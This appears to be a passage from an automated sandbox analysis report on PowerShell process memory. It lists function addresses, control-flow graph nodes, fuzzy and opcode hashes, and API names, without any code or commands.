                                                                                                                                                                                                                          Function 04402C06 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1694643091.0000000004400000.00000040.00000800.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_4400000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 525f60f6f515e65d2b98d04eb5ca6e66155684aff38cb2ad54c467ed8999eb40
                                                                                                                                                                                                                          • Instruction ID: 614270e051b35a769e8811effd01811a73eae62bcd8f82451c7eb7fb6c04b223
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 525f60f6f515e65d2b98d04eb5ca6e66155684aff38cb2ad54c467ed8999eb40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5F0B735A001059FDB15CB99D894AEEF7B1FF88324F208199E515A72A1C736EC52CB50

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:7.1%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:3
                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                          execution_graph 21761 8b87478 21762 8b874bb SetThreadToken 21761->21762 21763 8b874e9 21762->21763

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 04B6B490 Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 202 4b6b490-4b6b4b9 203 4b6b4be-4b6b7f9 call 4b6aab4 202->203 204 4b6b4bb 202->204 265 4b6b7fe-4b6b805 203->265 204->203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: kUKn^${UKn^$[Kn^
                                                                                                                                                                                                                          • API String ID: 0-1042817059
                                                                                                                                                                                                                          • Opcode ID: f25e3fb1deb43c0a7cdc90e408d00964241ca82ee43c42ec37f3b22c7d3a9a58
                                                                                                                                                                                                                          • Instruction ID: 73961a20f28b86e705589d84adecb65c4e738fde81559a7ebf3d03e0e9aa1584
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25e3fb1deb43c0a7cdc90e408d00964241ca82ee43c42ec37f3b22c7d3a9a58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E917271B00715DBEB25EFB498105AE7BF2EFC4604B04896DD906AB340DF39AE068BD5
                                                                                                                                                                                                                          Function 04B6B4A0 Relevance: 4.0, Strings: 3, Instructions: 252COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 266 4b6b4a0-4b6b4b9 267 4b6b4be-4b6b7f9 call 4b6aab4 266->267 268 4b6b4bb 266->268 329 4b6b7fe-4b6b805 267->329 268->267
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: kUKn^${UKn^$[Kn^
                                                                                                                                                                                                                          • API String ID: 0-1042817059
                                                                                                                                                                                                                          • Opcode ID: 42184a1da02f2cd805a711ccca62aa29d9336289780408441d5bf2a5aae9c657
                                                                                                                                                                                                                          • Instruction ID: 060029f7df6619ac6a46a3f1d3782d01acde83ba162f7e59ffc211de6914ff0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42184a1da02f2cd805a711ccca62aa29d9336289780408441d5bf2a5aae9c657
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56916371B00715DBEB25EFB498105AE7BF2EFC4604B04892DD916AB340DF39AE068BD5
                                                                                                                                                                                                                          Function 07912308 Relevance: 10.6, Strings: 8, Instructions: 636COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1681568298.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7910000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl$Jl$Jl$Jl$Jl$Jl$rl$rl
                                                                                                                                                                                                                          • API String ID: 0-685953168
                                                                                                                                                                                                                          • Opcode ID: 8e24c26b52a7ba1ef86f37a2c1bfff2973a10c5f530ab8ecd62a9eed06e5d77c
                                                                                                                                                                                                                          • Instruction ID: fc5d0e2a32ec43fb628dfd2bd246d215fc045a5c4ed2300d80596f1e91e525ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e24c26b52a7ba1ef86f37a2c1bfff2973a10c5f530ab8ecd62a9eed06e5d77c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D12205B1B0030ACFDB24EF6884417AABBF5BF89215F14847AD945CB291DB31D861C7A1
                                                                                                                                                                                                                          Function 08B87470 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 493 8b87470-8b874b3 494 8b874bb-8b874e7 SetThreadToken 493->494 495 8b874e9-8b874ef 494->495 496 8b874f0-8b8750d 494->496 495->496
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1690247208.0000000008B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_8b80000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ThreadToken
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3254676861-0
                                                                                                                                                                                                                          • Opcode ID: 5bd2677b0c21d8019a7525a0e7c8cac36cba9fb3345b55ee4f439c12664740dd
                                                                                                                                                                                                                          • Instruction ID: 8bc821ad229e52304669bed0c19c223a25307ae15734c915fa53def2069f49cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bd2677b0c21d8019a7525a0e7c8cac36cba9fb3345b55ee4f439c12664740dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B41134B58003498FDB10DFAAC884B9EFFF4AF88224F248459D458A7210C774A844CFA5
                                                                                                                                                                                                                          Function 08B87478 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 499 8b87478-8b874e7 SetThreadToken 501 8b874e9-8b874ef 499->501 502 8b874f0-8b8750d 499->502 501->502
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1690247208.0000000008B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_8b80000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ThreadToken
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3254676861-0
                                                                                                                                                                                                                          • Opcode ID: f27651a19e22aacc17ac83a5ee56d63ef7540c0f9af4600dcd0d50ea271de1f0
                                                                                                                                                                                                                          • Instruction ID: 7c7b3a2d7847388ce7b9dd0ea1a09ed799b1fbe88ea06e35f6d49906f36da42a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27651a19e22aacc17ac83a5ee56d63ef7540c0f9af4600dcd0d50ea271de1f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB1106B59003098FDB10DF9AD884B9EFFF8EF88624F248459D558A7350CB74A944CFA5
                                                                                                                                                                                                                          Function 07913CE8 Relevance: .6, Instructions: 586COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 618 7913ce8-7913d0d 619 7913f00-7913f4a 618->619 620 7913d13-7913d18 618->620 628 7913f50-7913f55 619->628 629 79140ce-79140ea 619->629 621 7913d30-7913d34 620->621 622 7913d1a-7913d20 620->622 626 7913eb0-7913eba 621->626 627 7913d3a-7913d3c 621->627 624 7913d22 622->624 625 7913d24-7913d2e 622->625 624->621 625->621 630 7913ec8-7913ece 626->630 631 7913ebc-7913ec5 626->631 632 7913d4c 627->632 633 7913d3e-7913d4a 627->633 635 7913f57-7913f5d 628->635 636 7913f6d-7913f71 628->636 652 79140f4-7914112 629->652 653 79140ec-79140f3 629->653 637 7913ed0-7913ed2 630->637 638 7913ed4-7913ee0 630->638 634 7913d4e-7913d50 632->634 633->634 634->626 645 7913d56-7913d75 634->645 641 7913f61-7913f6b 635->641 642 7913f5f 635->642 646 7914080-791408a 636->646 647 7913f77-7913f79 636->647 644 7913ee2-7913efd 637->644 638->644 641->636 642->636 675 7913d85 645->675 676 7913d77-7913d83 645->676 648 7914097-791409d 646->648 649 791408c-7914094 646->649 650 7913f89 647->650 651 7913f7b-7913f87 647->651 657 79140a3-79140af 648->657 658 791409f-79140a1 648->658 656 7913f8b-7913f8d 650->656 651->656 660 7914228-791424a 652->660 661 7914118-791411d 652->661 653->652 656->646 663 7913f93-7913fb2 656->663 664 79140b1-79140cb 657->664 658->664 678 7914254-791425d 660->678 679 791424c 660->679 665 7914135-7914139 661->665 666 791411f-7914125 661->666 703 7913fc2 663->703 704 7913fb4-7913fc0 663->704 673 79141da 665->673 674 791413f-7914141 665->674 671 7914127 666->671 672 7914129-7914133 666->672 671->665 672->665 680 79141db-79141e4 673->680 682 7914151 674->682 683 7914143-791414f 674->683 684 7913d87-7913d89 675->684 676->684 689 791428b-7914295 678->689 690 791425f-7914281 678->690 679->680 686 791424e-7914253 679->686 687 79141f1-79141f7 680->687 688 79141e6-79141ee 680->688 691 7914153-7914155 682->691 683->691 684->626 692 7913d8f-7913d96 684->692 686->678 694 79141f9-79141fb 687->694 695 79141fd-7914209 687->695 698 7914297-791429c 689->698 699 791429f-79142a5 689->699 729 7914283-7914288 690->729 730 79142d5-79142fe 690->730 691->673 697 791415b-791415d 691->697 692->619 702 7913d9c-7913da1 692->702 705 791420b-7914225 694->705 695->705 707 7914177-791417e 697->707 708 791415f-7914165 697->708 700 79142a7-79142a9 699->700 701 79142ab-79142b7 699->701 711 79142b9-79142d2 700->711 701->711 712 7913da3-7913da9 702->712 713 7913db9-7913dc8 702->713 714 7913fc4-7913fc6 703->714 704->714 709 7914180-7914186 707->709 710 7914196-79141d7 707->710 716 7914167 708->716 717 7914169-7914175 708->717 718 7914188 709->718 719 791418a-7914194 709->719 722 7913dab 712->722 723 7913dad-7913db7 712->723 713->626 735 7913dce-7913dec 713->735 714->646 724 7913fcc-7914003 714->724 716->707 717->707 718->710 719->710 722->713 723->713 747 7914005-791400b 724->747 748 791401d-7914024 724->748 744 7914300-7914326 730->744 745 791432d-791434a 730->745 735->626 746 7913df2-7913e17 735->746 744->745 756 7914354-791435c 745->756 757 791434c-7914353 745->757 746->626 771 7913e1d-7913e24 746->771 750 791400d 747->750 751 791400f-791401b 747->751 753 7914026-791402c 748->753 754 791403c-791407d 748->754 750->748 751->748 758 7914030-791403a 753->758 759 791402e 753->759 763 7914395-791439f 756->763 764 791435e-791437b 756->764 757->756 758->754 759->754 766 79143a1-79143a5 763->766 767 79143a8-79143ae 763->767 776 79143e5-79143ea 764->776 777 791437d-791438f 764->777 769 79143b0-79143b2 767->769 770 79143b4-79143c0 767->770 773 79143c2-79143e2 769->773 770->773 774 7913e26-7913e41 771->774 775 7913e6a-7913e9d 771->775 783 7913e43-7913e49 774->783 784 7913e5b-7913e5f 774->784 792 7913ea4-7913ead 775->792 776->777 777->763 786 7913e4b 783->786 787 7913e4d-7913e59 783->787 789 7913e66-7913e68 784->789 786->784 787->784 789->792
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1681568298.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7910000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8ff92f19f9030405e13a10a85b16c375fb77614768766452b9c059c01bf8b277
                                                                                                                                                                                                                          • Instruction ID: 1df80eee6989626356b5c18e2d7134743957acacb6d67fa9e32507b44715a862
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ff92f19f9030405e13a10a85b16c375fb77614768766452b9c059c01bf8b277
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D81258B170435A8FDB259B6898017AA7BB6AFC6319F24C4BAD805CB3A1DB31C851C791
                                                                                                                                                                                                                          Function 04B629F0 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1113 4b629f0-4b62a1e 1114 4b62a24-4b62a3a 1113->1114 1115 4b62af5-4b62b37 1113->1115 1116 4b62a3f-4b62a52 1114->1116 1117 4b62a3c 1114->1117 1119 4b62c51-4b62c61 1115->1119 1120 4b62b3d-4b62b56 1115->1120 1116->1115 1124 4b62a58-4b62a65 1116->1124 1117->1116 1122 4b62b5b-4b62b69 1120->1122 1123 4b62b58 1120->1123 1122->1119 1130 4b62b6f-4b62b79 1122->1130 1123->1122 1125 4b62a67 1124->1125 1126 4b62a6a-4b62a7c 1124->1126 1125->1126 1126->1115 1131 4b62a7e-4b62a88 1126->1131 1132 4b62b87-4b62b94 1130->1132 1133 4b62b7b-4b62b7d 1130->1133 1134 4b62a96-4b62aa6 1131->1134 1135 4b62a8a-4b62a8c 1131->1135 1132->1119 1136 4b62b9a-4b62baa 1132->1136 1133->1132 1134->1115 1137 4b62aa8-4b62ab2 1134->1137 1135->1134 1138 4b62baf-4b62bbd 1136->1138 1139 4b62bac 1136->1139 1140 4b62ab4-4b62ab6 1137->1140 1141 4b62ac0-4b62af4 1137->1141 1138->1119 1144 4b62bc3-4b62bd3 1138->1144 1139->1138 1140->1141 1145 4b62bd5 1144->1145 1146 4b62bd8-4b62be5 1144->1146 1145->1146 1146->1119 1149 4b62be7-4b62bf7 1146->1149 1150 4b62bfc-4b62c08 1149->1150 1151 4b62bf9 1149->1151 1150->1119 1154 4b62c0a-4b62c24 1150->1154 1151->1150 1155 4b62c26 1154->1155 1156 4b62c29 1154->1156 1155->1156 1157 4b62c2e-4b62c38 1156->1157 1158 4b62c3d-4b62c50 1157->1158
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a8742217235ab950c3ea5c361e18cac9dd2035700f5956878dd06180b3c1f6da
                                                                                                                                                                                                                          • Instruction ID: 4723c47faf4e5146421f9b898cf2d119446a11202c6baf6930c37d029b3de46d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8742217235ab950c3ea5c361e18cac9dd2035700f5956878dd06180b3c1f6da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2918D74A006058FDB19DF58C4D4AAEFBB1FF88310B248599D816AB765C739FC51CBA0
                                                                                                                                                                                                                          Function 04B67740 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5bc2b5313ddbef564779449d4faa6d7b25318a20bd5229fc68918c5148bcdbec
                                                                                                                                                                                                                          • Instruction ID: c2b540c5597accc98e2c588589dd734060b42b3df9ceeec17ccbb6fe82100266
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bc2b5313ddbef564779449d4faa6d7b25318a20bd5229fc68918c5148bcdbec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC51C1303042019FD704DB7AD844A6A77EAFFC9218B2545B9E50ACB352EF35EC02CB90
                                                                                                                                                                                                                          Function 04B6BAD0 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 89892e4d453918fa4c5817b07e49ee8a13fef9cdebd6589ce1b594a0af22703f
                                                                                                                                                                                                                          • Instruction ID: e270f3ac48737bf6519177c2cfca54a61b150a4a965d4aab5fcdad4330374947
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89892e4d453918fa4c5817b07e49ee8a13fef9cdebd6589ce1b594a0af22703f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C611471E00258CFDB14CFA9C584B9DBBF1EF88310F1581AAE919AB264EB34AD41CB50
                                                                                                                                                                                                                          Function 04B6BAC0 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c5a8ba275c60fa17a54451fc232f281ac6f7c7b84786d2877cf1718481779bcb
                                                                                                                                                                                                                          • Instruction ID: 75706121cf92b9dfe593528bf43dd29606441b021526e0bd93a2c941057ab684
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5a8ba275c60fa17a54451fc232f281ac6f7c7b84786d2877cf1718481779bcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC511671E04258DFDB14DFA9D484A9DBBF1FF88310F1580AAE919EB364EB34A941CB50
                                                                                                                                                                                                                          Function 07913CCC Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1681568298.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7910000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8984ae7bbd369097b4bf4e977db7d32911742dc27eb1ab608c70613a396c8639
                                                                                                                                                                                                                          • Instruction ID: b3ef538719b4ff0df6cd63301326ec5915f376999c3f699421dc945e00b74b83
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8984ae7bbd369097b4bf4e977db7d32911742dc27eb1ab608c70613a396c8639
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F4116F4B1030ADBCB218F24D5016BA7BB69F86218F14C0AAD8049F755DB31DC55CBA1
                                                                                                                                                                                                                          Function 04B66FE0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 825d23ae9eaa19dd12e8c6e519591241e0f547691a2a9b7437227d6ac029d085
                                                                                                                                                                                                                          • Instruction ID: a7252489282334426cf48e0f222cd882938e420a18570ff2f16f5c6b1f5f0a84
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 825d23ae9eaa19dd12e8c6e519591241e0f547691a2a9b7437227d6ac029d085
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46410834B042048FDB15DBA5C858AAABBF2EF8D715F145099E906EB391DF39AC01CB61
                                                                                                                                                                                                                          Function 04B62B00 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b7502b8bdc2e241eaf2389a4be7a290f672847ce5b5fc56327b08d5e0235c356
                                                                                                                                                                                                                          • Instruction ID: 427ffe9041aee3611efd59b38d109798ff83b21bab58deaa1237759877c57679
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7502b8bdc2e241eaf2389a4be7a290f672847ce5b5fc56327b08d5e0235c356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D414A74A006059FDB09DF58C4D8AAEFBB1FF88310B158599D816AB764C73AFC51CBA0
                                                                                                                                                                                                                          Function 04B6C398 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bf08e860d38c9a27d829fe537b5402bed3c145916d1150a93e9a1c154dc23c13
                                                                                                                                                                                                                          • Instruction ID: 284239614a8ef85d26d88716498c933521c29c13cf5ec260739cd37294f9e5f6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf08e860d38c9a27d829fe537b5402bed3c145916d1150a93e9a1c154dc23c13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6319E313007019FE715DB78D844B9ABBA2FFC4615F0486B9DA0ACB355DF75A805CB91
                                                                                                                                                                                                                          Function 04B66FD1 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3ee5efd7134e0bdb726af023ca54bb24a748787a321fcd59dd996bf044fa7db3
                                                                                                                                                                                                                          • Instruction ID: 4c224efcc02b924a1dcafbf924c0fdaaf47319b93bec519d2b1fb661b0839650
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ee5efd7134e0bdb726af023ca54bb24a748787a321fcd59dd996bf044fa7db3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8731D834A002058FDB15CFA5C558AAABBF2EF8D715F1550A9E806EB361DF35EC01CB60
                                                                                                                                                                                                                          Function 04B6AE70 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6d90927fc2607c3c9ac80fc50eca228c38401649c234e2c062850c270b41b061
                                                                                                                                                                                                                          • Instruction ID: 459d4241627f93040e1369a94137bbf8d0f5e503d926ce1232f1490395241e1e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d90927fc2607c3c9ac80fc50eca228c38401649c234e2c062850c270b41b061
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB315E70E016059FDF15DFA9D4947AE7BF6EF89300F1180A9E506EB250EB38AC418B55
                                                                                                                                                                                                                          Function 04B6AD38 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5a384ed403df1ab2a4dc5094b3066dc30fb8493e18bce762ddb9f3cf8d1c4636
                                                                                                                                                                                                                          • Instruction ID: 64b512bc702f0ea4a51d13ec5ffece44c4086082a9c765de1b35ab5ca9f5e029
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a384ed403df1ab2a4dc5094b3066dc30fb8493e18bce762ddb9f3cf8d1c4636
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB3194B0A002059FEB04EFA4D854AAE7BB2EFC5304F1584B9D605AB395DA39ED01CF61
